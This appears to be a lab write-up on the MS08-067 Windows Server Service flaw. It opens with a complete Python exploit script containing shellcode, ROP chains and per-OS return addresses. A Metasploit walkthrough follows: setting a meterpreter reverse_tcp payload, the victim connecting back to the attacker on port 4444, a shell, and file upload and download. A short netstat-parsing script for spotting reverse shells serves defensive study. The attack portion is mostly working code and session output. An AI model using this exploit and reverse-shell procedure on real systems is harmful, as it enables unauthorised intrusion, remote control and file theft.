shellcode += "\x8f\x98\x54\x95\x9f\x31\xe6\x56\xc7\xc0\xb6\x0e\x15"
shellcode += "\xa9\xaf\x3e\xa4\xa9\x3c\xe9\x15\xe1\x61\xec\x61\x4c"
shellcode += "\x76\x12\x93\xe1\x70\xe5\x7e\x95\x41\xde\xe3\x18\x8c"
shellcode += "\xa0\xba\x95\x53\x85\x15\xb8\x93\xdc\x4d\x86\x3c\xd1"
shellcode += "\xd5\x6b\xef\xc1\x9f\x33\x3c\xd9\x15\xe1\x67\x54\xda"
shellcode += "\xc4\x93\x86\xc5\x81\xee\x87\xcf\x1f\x57\x82\xc1\xba"
shellcode += "\x3c\xcf\x75\x6d\xea\xb5\xad\xd2\xb7\xdd\xf6\x97\xc4"
shellcode += "\xef\xc1\xb4\xdf\x91\xe9\xc6\xb0\x22\x4b\x58\x27\xdc"
shellcode += "\x9e\xe0\x9e\x19\xca\xb0\xdf\xf4\x1e\x8b\xb7\x22\x4b"
shellcode += "\x8a\xb2\xb5\x5e\x48\xa9\x90\xf6\xe2\xb7\xdc\x25\x69"
shellcode += "\x51\x8d\xce\xb0\xe7\x9d\xce\xa0\xe7\xb5\x74\xef\x68"
shellcode += "\x3d\x61\x35\x20\xb7\x8e\xb6\xe0\xb5\x07\x45\xc3\xbc"
shellcode += "\x61\x35\x32\x1d\xea\xea\x48\x93\x96\x95\x5b\x35\xff"
shellcode += "\xe0\xb7\xdd\xf4\xe0\xdd\xd9\xc8\xb7\xdf\xdf\x47\x28"
shellcode += "\xe8\x22\x4b\x63\x4f\xdd\xe0\xd6\x3c\xeb\xf4\xa0\xdf"
shellcode += "\xdd\x8e\xe0\xb7\x8b\xf4\xe0\xdf\x85\x3a\xb3\x52\x22"
shellcode += "\x4b\x73\xe4\xb7\x9e\xb6\xe4\x8a\xf6\xe2\x6e\x15\xc1"
shellcode += "\x1f\x62\x5e\x66\xe0\xca\xff\xc6\x88\xb7\x9d\x9e\xe0"
shellcode += "\xdd\xdd\xce\x88\xbc\xf2\x91\xd0\x48\x08\xc9\x88\xc2"
shellcode += "\xb3\xd3\x81\x48\x08\xc0\xbe\x48\xd1\xba\x09\xc6\x22"
shellcode += "\x61\x1f\xb6\x1e\xb7\x26\xc2\x1a\x5d\x5b\x57\xc0\xb4"
shellcode += "\xea\xdf\x7b\x0b\x5d\x2a\x22\x4b\xdc\xb1\xa1\x94\x60"
shellcode += "\x4c\x3d\xeb\xe5\x0c\x9a\x8d\x92\xd8\xb7\x9e\xb3\x48"
shellcode += "\x08\x9e\xe0"

nonxjmper = "\x08\x04\x02\x00%s"+"A"*4+"%s"+"A"*42+"\x90"*8+"\xeb\x62"+"A"*10
disableNXjumper = "\x08\x04\x02\x00%s%s%s"+"A"*28+"%s"+"\xeb\x02"+"\x90"*2+"\xeb\x62"
ropjumper = "\x00\x08\x01\x00"+"%s"+"\x10\x01\x04\x01";
module_base = 0x6f880000
def generate_rop(rvas):
	gadget1="\x90\x5a\x59\xc3"
	gadget2 = ["\x90\x89\xc7\x83", "\xc7\x0c\x6a\x7f", "\x59\xf2\xa5\x90"]	
	gadget3="\xcc\x90\xeb\x5a"	
	ret=struct.pack('<L', 0x00018000)
	ret+=struct.pack('<L', rvas['call_HeapCreate']+module_base)
	ret+=struct.pack('<L', 0x01040110)
	ret+=struct.pack('<L', 0x01010101)
	ret+=struct.pack('<L', 0x01010101)
	ret+=struct.pack('<L', rvas['add eax, ebp / mov ecx, 0x59ffffa8 / ret']+module_base)
	ret+=struct.pack('<L', rvas['pop ecx / ret']+module_base)
	ret+=gadget1
	ret+=struct.pack('<L', rvas['mov [eax], ecx / ret']+module_base)
	ret+=struct.pack('<L', rvas['jmp eax']+module_base)
	ret+=gadget2[0]
	ret+=gadget2[1]
	ret+=struct.pack('<L', rvas['mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret']+module_base)
	ret+=struct.pack('<L', rvas['pop ecx / ret']+module_base)
	ret+=gadget2[2]
	ret+=struct.pack('<L', rvas['mov [eax+0x10], ecx / ret']+module_base)
	ret+=struct.pack('<L', rvas['add eax, 8 / ret']+module_base)
	ret+=struct.pack('<L', rvas['jmp eax']+module_base)
	ret+=gadget3	
	return ret
class SRVSVC_Exploit(Thread):
    def __init__(self, target, os, port=445):
        super(SRVSVC_Exploit, self).__init__()
        self.__port   = port
        self.target   = target
        self.os       = os


    def __DCEPacket(self):
	if (self.os=='1'):
		print 'Windows XP SP0/SP1 Universal\n'
		ret = "\x61\x13\x00\x01"
		jumper = nonxjmper % (ret, ret)
	elif (self.os=='2'):
		print 'Windows 2000 Universal\n'
		ret = "\xb0\x1c\x1f\x00"
		jumper = nonxjmper % (ret, ret)
	elif (self.os=='3'):
		print 'Windows 2003 SP0 Universal\n'
		ret = "\x9e\x12\x00\x01"  #0x01 00 12 9e
		jumper = nonxjmper % (ret, ret)
	elif (self.os=='4'):
		print 'Windows 2003 SP1 English\n'
		ret_dec = "\x8c\x56\x90\x7c"  #0x7c 90 56 8c dec ESI, ret @SHELL32.DLL
		ret_pop = "\xf4\x7c\xa2\x7c"  #0x 7c a2 7c f4 push ESI, pop EBP, ret @SHELL32.DLL
		jmp_esp = "\xd3\xfe\x86\x7c" #0x 7c 86 fe d3 jmp ESP @NTDLL.DLL
		disable_nx = "\x13\xe4\x83\x7c" #0x 7c 83 e4 13 NX disable @NTDLL.DLL
		jumper = disableNXjumper % (ret_dec*6, ret_pop, disable_nx, jmp_esp*2)
	elif (self.os=='5'):
		print 'Windows XP SP3 French (NX)\n'
		ret = "\x07\xf8\x5b\x59"  #0x59 5b f8 07 
		disable_nx = "\xc2\x17\x5c\x59" #0x59 5c 17 c2 
		jumper = nonxjmper % (disable_nx, ret)  #the nonxjmper also work in this case.
	elif (self.os=='6'):
		print 'Windows XP SP3 English (NX)\n'
		ret = "\x07\xf8\x88\x6f"  #0x6f 88 f8 07 
		disable_nx = "\xc2\x17\x89\x6f" #0x6f 89 17 c2 
		jumper = nonxjmper % (disable_nx, ret)  #the nonxjmper also work in this case.
	elif (self.os=='7'):
		print 'Windows XP SP3 English (AlwaysOn NX)\n'
		rvasets = {'call_HeapCreate': 0x21286,'add eax, ebp / mov ecx, 0x59ffffa8 / ret' : 0x2e796,'pop ecx / ret':0x2e796 + 6,'mov [eax], ecx / ret':0xd296,'jmp eax':0x19c6f,'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret':0x10a56,'mov [eax+0x10], ecx / ret':0x10a56 + 6,'add eax, 8 / ret':0x29c64}
		jumper = generate_rop(rvasets)+"AB"  #the nonxjmper also work in this case.
	else:
		print 'Not supported OS version\n'
		sys.exit(-1)
	print '[-]Initiating connection'

        self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
        self.__trans.connect()
        print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target
        self.__dce = self.__trans.DCERPC_class(self.__trans)
        self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))

        path ="\x5c\x00"+"ABCDEFGHIJ"*10 + shellcode +"\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00" + "\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00"  + jumper + "\x00" * 2

        server="\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00"
        prefix="\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00"

        self.__stub=server+"\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01\x00\x00" + path +"\xE8\x03\x00\x00"+prefix+"\x01\x10\x00\x00\x00\x00\x00\x00"

        return

    def run(self):
        self.__DCEPacket()
        self.__dce.call(0x1f, self.__stub) 
        time.sleep(5)
        print 'Exploit finish\n'

if __name__ == '__main__':
    try:
        target = sys.argv[1]
        os = sys.argv[2]
    except IndexError:
        print '\nUsage: %s <target ip> <os>\n' % sys.argv[0]
        print 'Example: MS08_067.py 192.168.1.1 1 for Windows XP SP0/SP1 Universal\n'
        print 'Example: MS08_067.py 192.168.1.1 2 for Windows 2000 Universal\n'
        sys.exit(-1)

    current = SRVSVC_Exploit(target, os)
    current.start()


[root@kali ~]# msfconsole

msf6 > search ms08_067

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption

Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi

msf6 > info exploit/windows/smb/ms08_067_netapi 

       Name: MS08-067 Microsoft Server Service Relative Path Stack Corruption   <-- name describing the module
     Module: exploit/windows/smb/ms08_067_netapi  <-- module name
   Platform: Windows  <-- the platform the exploit applies to (Windows systems)
       Arch: 
 Privileged: Yes  <-- tells whether a successful exploit yields privileged access on the target system
    License: Metasploit Framework License (BSD)
       Rank: Great   <-- the rank lists the potential impact of the exploit on the target system
  Disclosed: 2008-10-28  <-- disclosure date

Provided by:  <-- authors
  hdm <x@hdm.io>
  Brett Moore <brett.moore@insomniasec.com>
  frank2 <frank2@dc949.org>
  jduck <jduck@metasploit.com>

Available targets:    <-- the available targets list the OS versions and patch levels this module can attack
  Id  Name                (81 exploitable targets in total, plus Automatic Targeting)
  --  ----
  0   Automatic Targeting
  1   Windows 2000 Universal
  2   Windows XP SP0/SP1 Universal
  3   Windows 2003 SP0 Universal
  4   Windows XP SP2 English (AlwaysOn NX)
  5   Windows XP SP2 English (NX)
  6   Windows XP SP3 English (AlwaysOn NX)
  7   Windows XP SP3 English (NX)
  8   Windows XP SP2 Arabic (NX)
  9   Windows XP SP2 Chinese - Traditional / Taiwan (NX)
  10  Windows XP SP2 Chinese - Simplified (NX)
  11  Windows XP SP2 Chinese - Traditional (NX)
  12  Windows XP SP2 Czech (NX)
  13  Windows XP SP2 Danish (NX)
  14  Windows XP SP2 German (NX)
  15  Windows XP SP2 Greek (NX)
  16  Windows XP SP2 Spanish (NX)
  17  Windows XP SP2 Finnish (NX)
  18  Windows XP SP2 French (NX)
  19  Windows XP SP2 Hebrew (NX)
  20  Windows XP SP2 Hungarian (NX)
  21  Windows XP SP2 Italian (NX)
  22  Windows XP SP2 Japanese (NX)
  23  Windows XP SP2 Korean (NX)
  24  Windows XP SP2 Dutch (NX)
  25  Windows XP SP2 Norwegian (NX)
  26  Windows XP SP2 Polish (NX)
  27  Windows XP SP2 Portuguese - Brazilian (NX)
  28  Windows XP SP2 Portuguese (NX)
  29  Windows XP SP2 Russian (NX)
  30  Windows XP SP2 Swedish (NX)
  31  Windows XP SP2 Turkish (NX)
  32  Windows XP SP3 Arabic (NX)
  33  Windows XP SP3 Chinese - Traditional / Taiwan (NX)
  34  Windows XP SP3 Chinese - Simplified (NX)
  35  Windows XP SP3 Chinese - Traditional (NX)
  36  Windows XP SP3 Czech (NX)
  37  Windows XP SP3 Danish (NX)
  38  Windows XP SP3 German (NX)
  39  Windows XP SP3 Greek (NX)
  40  Windows XP SP3 Spanish (NX)
  41  Windows XP SP3 Finnish (NX)
  42  Windows XP SP3 French (NX)
  43  Windows XP SP3 Hebrew (NX)
  44  Windows XP SP3 Hungarian (NX)
  45  Windows XP SP3 Italian (NX)
  46  Windows XP SP3 Japanese (NX)
  47  Windows XP SP3 Korean (NX)      <-- matches Victim1's OS
  48  Windows XP SP3 Dutch (NX)
  49  Windows XP SP3 Norwegian (NX)
  50  Windows XP SP3 Polish (NX)
  51  Windows XP SP3 Portuguese - Brazilian (NX)
  52  Windows XP SP3 Portuguese (NX)
  53  Windows XP SP3 Russian (NX)
  54  Windows XP SP3 Swedish (NX)
  55  Windows XP SP3 Turkish (NX)
  56  Windows 2003 SP1 English (NO NX)
  57  Windows 2003 SP1 English (NX)
  58  Windows 2003 SP1 Japanese (NO NX)
  59  Windows 2003 SP1 Spanish (NO NX)
  60  Windows 2003 SP1 Spanish (NX)
  61  Windows 2003 SP1 French (NO NX)
  62  Windows 2003 SP1 French (NX)
  63  Windows 2003 SP2 English (NO NX)
  64  Windows 2003 SP2 English (NX)
  65  Windows 2003 SP2 German (NO NX)
  66  Windows 2003 SP2 German (NX)
  67  Windows 2003 SP2 Portuguese (NX)
  68  Windows 2003 SP2 Portuguese - Brazilian (NX)
  69  Windows 2003 SP2 Spanish (NO NX)
  70  Windows 2003 SP2 Spanish (NX)
  71  Windows 2003 SP2 Japanese (NO NX)
  72  Windows 2003 SP2 French (NO NX)
  73  Windows 2003 SP2 French (NX)
  74  Windows 2003 SP2 Chinese - Simplified (NX)
  75  Windows 2003 SP2 Czech (NX)
  76  Windows 2003 SP2 Dutch (NX)
  77  Windows 2003 SP2 Hungarian (NX)
  78  Windows 2003 SP2 Italian (NX)
  79  Windows 2003 SP2 Russian (NX)
  80  Windows 2003 SP2 Swedish (NX)
  81  Windows 2003 SP2 Turkish (NX)

Check supported:
  Yes

Basic options:    <-- the basic options are the settings the module requires
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT    445              yes       The SMB service port (TCP)
  SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload information:     <-- the payload information describes the constraints on payloads usable with this exploit
  Space: 408
  Avoid: 8 characters

Description:     <-- the description gives more detail on the specific vulnerability this module exploits
  This module exploits a parsing flaw in the path canonicalization 
  code of NetAPI32.dll through the Server Service. This module is 
  capable of bypassing NX on some operating systems and service packs. 
  The correct target must be used to prevent the Server Service (along 
  with a dozen others in the same process) from crashing. Windows XP 
  targets seem to handle multiple successful exploitation events, but 
  2003 targets will often crash or hang on subsequent attempts. This 
  is just the first version of this module, full support for NX bypass 
  on 2003, along with other platforms, is still in development.

References:  <-- the references are links to online vulnerability database entries
  https://nvd.nist.gov/vuln/detail/CVE-2008-4250
  OSVDB (49243)
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/MS08-067
  http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos


View the full module info with the info -d command.

>>> Attack sequence <<<

1. Search for the exploit module: search
2. Select the exploit module: use
3. Select the payload: set payload
4. Set the module option values: show options -> set
5. Configure the payload options: set ...
6. Launch the exploit: exploit

search ms08_067
use exploit/windows/smb/ms08_067_netapi
show options
set  payload windows/meterpreter/reverse_tcp
set RHOSTS 200.200.200.4
show options

msf6 exploit(windows/smb/ms08_067_netapi) > exploit 

[*] Started reverse TCP handler on 200.200.200.3:4444 
[*] 200.200.200.4:445 - Automatically detecting the target...
[*] 200.200.200.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:Korean
[*] 200.200.200.4:445 - Selected Target: Windows XP SP3 Korean (NX)
[*] 200.200.200.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175686 bytes) to 200.200.200.4
[*] Meterpreter session 1 opened (200.200.200.3:4444 -> 200.200.200.4:1078) at 2023-03-09 01:49:14 -0500

meterpreter > 

Because the firewall on the target's Windows XP is disabled, the exploit command sends the attack packets, and
when the attack succeeds the "Meterpreter session 1 opened" message shown above is printed and a meterpreter prompt appears.

Structure of the meterpreter shell once the attack has connected

                +-- meterpreter shell
                |
  Attacker      |        Victim1
+----------+    v      +----------+
|          |  +===+    |          |
|          |  |   |    |          |
|   4444 ---->| M |<------- 1078  |
|          |  |   |    |          |
|          |  +===+    |          |
+----------+           +----------+
200.200.200.3          200.200.200.4
                       firewall.cpl disabled


meterpreter > help

meterpreter > shell
Process 1056 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

C:\WINDOWS\system32>ipconfig       
ipconfig

Windows IP Configuration


Ethernet adapter ·τ`¿µ¿ª ¿¬°

        Connection-specific DNS Suffix  . : 
        IP Address. . . . . . . . . . . . : 200.200.200.4
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 200.200.200.2

Checking with netstat or tcpview shows the established connection.
C:\>netstat -na | findstr 4444
  TCP    200.200.200.4:1078     200.200.200.3:4444     ESTABLISHED

C:\WINDOWS\system32>exit
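The netstat check above is also the simplest host-side triage for a reverse shell: the victim holds an outbound ESTABLISHED connection from an ephemeral local port to a remote port no workstation service normally uses. The following Python script is an added example, not part of the original notes: it parses Windows netstat -na output, uses the LISTENING rows to tell inbound from outbound connections, and lists the outbound ones whose remote port is outside an assumed allow-list. The sample output is constructed around the line shown in this lab, and the allow-list and function names are my own assumptions.

```python
import re

# Constructed sample of Windows 'netstat -na' output, modelled on the line
# shown in this lab (not real output from these notes).
NETSTAT_SAMPLE = """\

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    200.200.200.4:139      0.0.0.0:0              LISTENING
  TCP    200.200.200.4:445      200.200.200.7:49213    ESTABLISHED
  TCP    200.200.200.4:1050     200.200.200.2:80       ESTABLISHED
  TCP    200.200.200.4:1078     200.200.200.3:4444     ESTABLISHED
  UDP    0.0.0.0:445            *:*
"""

# One TCP row: proto, local addr:port, foreign addr:port, state
ROW_RE = re.compile(
    r'^\s*TCP\s+(?P<local>\S+):(?P<lport>\d+)\s+(?P<remote>\S+):(?P<rport>\d+)\s+(?P<state>\S+)')

# Remote ports a workstation is expected to talk to (assumed allow-list).
EXPECTED_REMOTE_PORTS = {53, 80, 139, 443, 445}


def parse_netstat(text):
    """Return one dict per TCP row of netstat -na output."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            rows.append({'local': m['local'], 'lport': int(m['lport']),
                         'remote': m['remote'], 'rport': int(m['rport']),
                         'state': m['state']})
    return rows


def unexpected_outbound(rows, expected=EXPECTED_REMOTE_PORTS):
    """ESTABLISHED connections that were opened by this host (local port is not
    a listening port) to a remote port outside the allow-list."""
    listening = {r['lport'] for r in rows if r['state'] == 'LISTENING'}
    return [(r['local'], r['lport'], r['remote'], r['rport']) for r in rows
            if r['state'] == 'ESTABLISHED'
            and r['lport'] not in listening
            and r['rport'] not in expected]


if __name__ == '__main__':
    for local, lport, remote, rport in unexpected_outbound(parse_netstat(NETSTAT_SAMPLE)):
        print('outbound %s:%d -> %s:%d is not on the allow-list' % (local, lport, remote, rport))
```

The inbound SMB session from 200.200.200.7 is skipped because local port 445 is listening, and the web connection to port 80 is on the allow-list, so only the 1078 -> 4444 connection from the lab is reported.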

Lab> File upload

ls  : Remote ls
lls : Local ls

meterpreter > help upload
Usage: upload [options] src1 src2 src3 ... destination

Uploads local files and directories to the remote machine.

OPTIONS:

    -h  Help banner
    -r  Upload recursively

meterpreter > upload /etc/passwd /etc/group c:/
meterpreter > upload /bin/ls c:/
meterpreter > ls c:/

meterpreter > help download 
Usage: download [options] src1 src2 src3 ... destination

Downloads remote files and directories to the local machine.

OPTIONS:

    -a   Enable adaptive download buffer size
    -b   Set the initial block size for the download
    -c   Resume getting a partially-downloaded file
    -h   Help banner
    -l   Set the limit of retries (0 unlimits)
    -r   Download recursively
    -t   Timestamp downloaded files

Download a file from the victim (target) and compare its size with the original.
meterpreter > download C:/windows/system32/notepad.exe
[*] Downloading: C:/windows/system32/notepad.exe -> /root/notepad.exe
[*] Downloaded 66.00 KiB of 66.00 KiB (100.0%): C:/windows/system32/notepad.exe -> /root/notepad.exe
[*] download   : C:/windows/system32/notepad.exe -> /root/notepad.exe
meterpreter > lls notepad.exe
100644/rw-r--r--  67584  fil  2008-04-14 08:00:00 -0400  notepad.exe

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 200.200.200.4 - Meterpreter session 1 closed.  Reason: Died
msf6 exploit(windows/smb/ms08_067_netapi) > exit